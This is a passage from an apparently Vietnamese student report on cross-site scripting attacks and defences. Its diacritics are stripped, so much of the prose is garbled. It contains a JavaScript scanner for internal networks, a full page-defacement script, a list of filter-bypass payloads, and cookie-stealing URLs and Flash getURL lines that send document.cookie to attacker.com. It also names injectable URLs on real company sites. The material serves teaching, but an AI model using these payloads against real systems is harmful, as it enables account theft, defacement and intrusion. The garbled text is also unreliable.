m hacker c th khai thc.

Hnh 2.7 Giao din JavaScript Error Message Login Checker.Bng cch click vo nt Check, attacker c th thy ti khon ca ngi dng ang trng thi no.V d: s dng dch v Gmail, khi dng th: ng nhp s c hin th ti thng bo li ti giao din mn hnh JavaScript Console.

Hnh 2.8 Li ng nhp gmail khng hp l t ngi dngTi y s xut hin cc thng tin v ng nhp ca ngi dng v attacker c th khai thc nhng thng tin ny.Lu : Cc thng bo li cng nh v tr s dng b li c s khc nhau, cng mt v tr a ra yu cu nhng trng ng nhp s khc vi trng thi cha ng nhp. Chnh v th s c s khc bit trong cc thng ip li.b. Tn cng qua mng Intranet:Hu ht chng ta tin rng trong khi lt Web mnh c bo v bi tng la, cch ly thng qua lp a ch IP ring. Vi s hiu bit ny, gi s cc phn mm bo mt ca nhng trang Web mng ni b v giao din Web da trn cc thit b nh tuyn router, h thng tng la, IP Phone. th ngay c khi cc bn v li cha c cp nht chng ta vn an ton trong khu vc c bo v bi cc phn mm bo mt trn, iu ny c v khng kh thi lm. Trnh duyt Web hon ton c th c kim sot bi bt k trang web no, cho php ngi dng tr thnh tm im cho cc cuc tn cng mng ni b. Hy tng tng xem khi truy cp vo mt Website c cha phn mm c hi vi cc on m JavaScript, n c th cu hnh li mt cch t ng router hay tng la t to thnh mt ng hm thng ra th gii mng bn ngoi. Hnh 2.9 Minh ha qu trnh tn cng mng ni bCc bc khai thc:Bc 1: Mt nn nhn truy cp vo mt trang Web c hi hoc nhn vo mt lin kt khng r rng, s b nhng m JavaScript cha phn mm c hi, sau s kim sot trnh duyt ca h.Bc 2: M c JavaScript Malware s ti mt ng dng trn nn Java Applet v lm l ra a ch IP ca nn nhn thng qua NAT IP.Bc 3: Sau s dng trnh duyt ca nn nhn nh mt nn tng tn cng, m c JavaScript s xc nh my ch Web trn mng ni b.Bc 4: Pht ng tn cng chng li cc Web ni b hoc Web bn ngoi, thu thp thng tin nh cp c v gi ra mng bn ngoi.Ly a ch IP NAT ly c IP hacker gi mt Java Applet c bit c kh nng trch xut IP, y s dng lp MyAddress.class c vit bng ngn ng Java, sau khi cc m code trong lp MyAddress.class c load th n s m mt URL http://attacker/demo.html?IP=XXXX cho cc truy cp t xa v tr v a ch IP m ta mun. Sau y l mt on m thc thi

Port ScanningVi a ch IP ni b ca cc trnh duyt Web c chp li c th qut trong phm vi cc b ca my ch Web, nu v mt l do no m khng c c a ch IP ni b, c th dng k thut on a ch trong lp mng c cp (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) nhng qu trnh ny khng mang li hiu qu cao. Tip tc s dng lp mng 192.168.0.100 l a ch IP ca trnh duyt Web, gi s mun qut lp mng C 192.168.0.0-255 trn port 80 s dng m code sau:/* ghi nhn s kin */ window.onerror = err;/* khi ng qut mng ni b */ scanWebServers(internal_ip);/* qut mng ni b */ function scanWebServers(ip) {/* tch octet cui cng ra khi a ch mng ni b */var net = ip.substring(0, ip.lastIndexOf('.') + 1);/* Bt u t 0 n 255 cho octet cui cng */var start = 0; var end = 255; var x = start; var timeout = 0;/* thit lp ci t v tng thuc tnh setTimeout tun t vi phng thc window.stop() bi v khng c mt Webserver no l c IP c ch nh trc,trnh duyt s b treo trong mt khong thi gian qu lu cho n khi thi gian ch kt thc, nu c nhiu kt ni cng lc s gy ra Dos*/while (x < end) { timeout += 500; vary=x+20;if (y > end) { y = end; }/* gi khi IP cn qut*/setTimeout("scan(" +x+","+y+",'"+net+ "')", timeout);timeout += 6000;self.setTimeout("window.stop();", timeout);x += 21;}} // kt thc vic qut Webserver/* qut khi IP*/function scan(start, end, range) { var start_num = 0;if (start) { start_num = start; }var end_num = 255;if (end) { end_num = end; }/*loop through number range*/ for (var n = start_num; n File story.js c th l mt on vn m t thng tin hoc km theo mt hnh nh no .V d, mt URL c cha on m script thc thi XSS :http://ha.ckers.org/weird/stallowned.jsNi dung file stallowned.js c nh ngha nh sau:var title = "XSS Defacement"; var bgcolor = "#000000"; var image_url = "http://ha.ckers.org/images/stallowned.jpg"; var text = "This page has been Hacked!"; var font_color = "#FF0000"; deface(title, bgcolor, image_url, text, font_color); function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {document.title = pageTitle;document.body.innerHTML = ''; document.bgColor = bgColor;var overLay = document.createElement("div");overLay.style.textAlign = 'center';document.body.appendChild(overLay);var txt = document.createElement("p");txt.style.font = 'normal normal bold 36px Verdana';txt.style.color = fontColor;txt.innerHTML = pageText;overLay.appendChild(txt);if (image_url != "") {var newImg = document.createElement("img");newImg.setAttribute("border", '0');newImg.setAttribute("src", imageUrl);overLay.appendChild(newImg);}var footer = document.createElement("p");footer.style.font = 'italic normal normal 12px Arial';footer.style.color = '#DDDDDD';footer.innerHTML = title;overLay.appendChild(footer); }

Mt s cch Deface Website n gin: Thay i mu ca backgrounddocument.body.bgcolor= mu bt k;

V d: http://targetsite.com/document.body.bgcolor= red Thay i hnh nndocument.body.background="http://hnh ca bn.jpg";

Deface bng PasteHTMLTrc tin, bn upload trang deface ca mnh lnPastehtmlv sau ly link. Khi bn tm c trang no b li XSS th bn nh on script sau vo URL:window.location="http://pastehtml.com/link_deface_m_bn__upload";

on script s redirect n trang deface ca bn upload. Deface bng iframeTrong th iframe, hacker c th chn malware vo website bng XSS. Nu nh c ngi dng no truy cp vo website ny s redirect n trang web cha malware, khi my tnh ca ngi dng s b dnh malware. u tin, attacker cn tm trang web b li XSS. Sau kim tra th c th insert vi th iframe khng. Nu thnh cng th attacker s chn on script sau vo URL:

i vi cc trang web bng PHP:echo ;

3. Khai thc nhng cch tn cng XSSa. Phng php tn cng XSS truyn thng:ng dng Web thng lu tr thng tin quan trng cookie. Cookie l mu thng tin m ng dng lu trn a cng ca ngi s dng. Nhng ch ng dng thit lp ra cookie th mi c th c n. Do ch khi ngi dng ang trong phin lm vic ca ng dng th hacker mi c c hi nh cp cookie. Cng vic u tin ca hacker l tm trang ch mi gi ngi dng ng nhp sau khi tm ra l hng trn ng dng .

Hnh 2.10 Qu trnh thc hin XSSTm tt cc bc thc hin:Bc 1: Hacker bit c ngi dng ang s dng mt ng dng Web c l hng XSS.Bc 2: Ngi dng nhn c mt lin kt thng qua email hay trn chnh trang Web (nh trn guestbook, banner d dng thm 1 lin kt do chnh hacker to ra). Thng thng hacker khin ngi dng ch bng nhng thng ip kch thch s t m ca ngi dng nh Kim tra ti khon, mt phn thng hp dn ang ch bn, Bc 3: Chuyn ni dung thng tin (cookie, tn, mt khu) v my ch ca hacker.Bc 4: Hacker to mt chng trnh cgi (v d steal.cgi) hoc mt trang Web ghi nhn nhng thng tin nh cp vo 1 tp tin.Bc 5: Sau khi nhn c thng tin cn thit, hacker c th s dng thm nhp vo ti khon ngi dng.V d: khai thc l hng trn ng dng hotwired.lycos.com, hacker c th thc hin nh sau:Look at this! Mt phn thng hp dn ang ch bn

Sau khi ngi dng nhn vo lin kt Mt phn thng hp dn ang ch bn, cookie trn my nn nhn s b nh cp v l tham s truyn vo cho chng trnh steal.cgi ca hacker.http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286Vn t ra l c th ngi lp trnh s bo v ng dng Web ca mnh bng cch lc nhng k t c bit nh , hay + (c th trnh trng hp dng du thc hin truy vn SQL )Nhng hacker c th li dng m hex thay cho nhng k t c bit tn cng.Thay th bng nhng s hex cho nhng k t ASCIIV d: http://www.attacker.com/steal.cgih -> 0x0068t -> 0x0074t -> 0x0074p -> 0x0070: -> 0x003A/ -> 0x002FMt s Website tm thy l hng XSSTn cng tyDomainNhng lin kt b khai thc

NBChttp://www.shopnbc.comhttp://www.shopnbc.com/listing.asp?qu= alert(document.cookie)&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1

Microsofthttp://www.microsoft.comhttp://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target=alert(document.cookie)

Chasehttp://www.chase.comhttps://www.chase.com/chase/gx.cgi/FTcs?pagename=alert(document.cookie)&urlname=smallbusiness/direc

Ebayhttp://scgi.ebay.co.uk/https://scgi.ebay.co.uk/sawcgi/eBayISAPI.dll?SSLRegisterShow&countryid=3&siteId=3&co_partnerId=0&UsingSSL=1&aolemail=alert(document.cookie)

Oracle Japanhttp://www.oracle.co.jp/http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=alert(document.cookie)

Bng 2.1 Danh sch cc l hng XSS c pht hin trn website mt s cng ty ln.b. K thut ByPass v phng php tn cng:Mt s site dnh XSS nhng li khng th tn cng bng nhng on m n gin, gii php ngh n l phi bypass b lc. C mt s dng bypass on m script nh sau:alert("Check By Soleil")alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 8 3, 111, 108, 101, 105, 108)) alert("Check By Soleil ")alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))alert("Check By Soleil ")alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))">">alert("Check By Soleil ")">'>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))">'>alert(String.fromCharCode(67,10 4,101,99,107,32,66,121,32,83,111,108,101,105,108,4 5,86,72,66,32,89,104,58,100,117,99,100,117,110,103 ,46,48,56,99,108,99 ))";alert("Check By Soleil ");"";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"';alert("Check By Soleil ");'';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'";alert("Check By Soleil ")";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))';alert("Check By Soleil ")';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))

Trong : 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chnh l chui string Check By Soleil dng char.V d:Attacker c th chn vo thanh tm kim site http://eclectasy.com on m Bypass sau:alert(XSS)

T xc nh site ny dnh li XSS v s tm cch khai thc , chim quyn iu khin vi site ny.

Hnh 2.11 M t mt trang b li XSSc. K thut tn cng bng Flash: Ngoi nhng cch a mt on m nguy him th hacker cn c th li dng nhng tp tin flash nh cp thng tin.Macromedia Flash cho php lp trnh bng mt ngn ng kch bn c xy dng sn trong Flash l ActionScript. ActionScript c c php n gin v tng t nh JavaScript, C hay Perl. V d hm getURL() dng gi mt trang Web khc, tham s thng l mt URL chng hn nh http://www.yahoo.com.V d:getURL(http://www.yahoo.com)Tuy nhin c th thay th URL bng JavaScript:getURL(javascript:alert(document.cookie))V d trn s lm xut hin bng thng bo cha cookie ca trang web cha tp tin flash . Nh vy, trang web b tn cng bng cch chn mt on JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v cch tn cng ny l:getURL(javascript:location(http://www.attacker.com?newcookie=+document.cookie))y l on lnh trong tp tin flash v c thc thi khi tp tin flash c c.Nh vy khi ngi dng xem trang web cha tp tin flash ny th ngay lp tc cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker.V d:DeviantArt l mt trang web ni ting, cho php thnh vin ca n gi cc tp tin flash ln cho mi thnh vin cng xem. V th hacker c th n cp cookie ca cc thnh vin v cng c th l ti khon ca ngi qun tr Web, bng cch ng k lm thnh vin ca ng dng Web ny, hacker gi tp tin flash ln my ch v i cc nn nhn xem tp tin flash . Di y l a ch lin kt n mt tp tin flash nh trnh by trong v d trn:http://www.deviantart.com/deviantion/1386080Ngoi ra cc trang web cho php thnh vin gi d liu dng HTML nh din n, cc chc nng to ch k ring, cng c th l mc tiu ca cch tn cng ny, bng cch nhp on m gi tp tin flash vo.

Documents

TÌM HIỂU XSS CÁCH TẤN CÔNG VÀ PHÒNG THỦ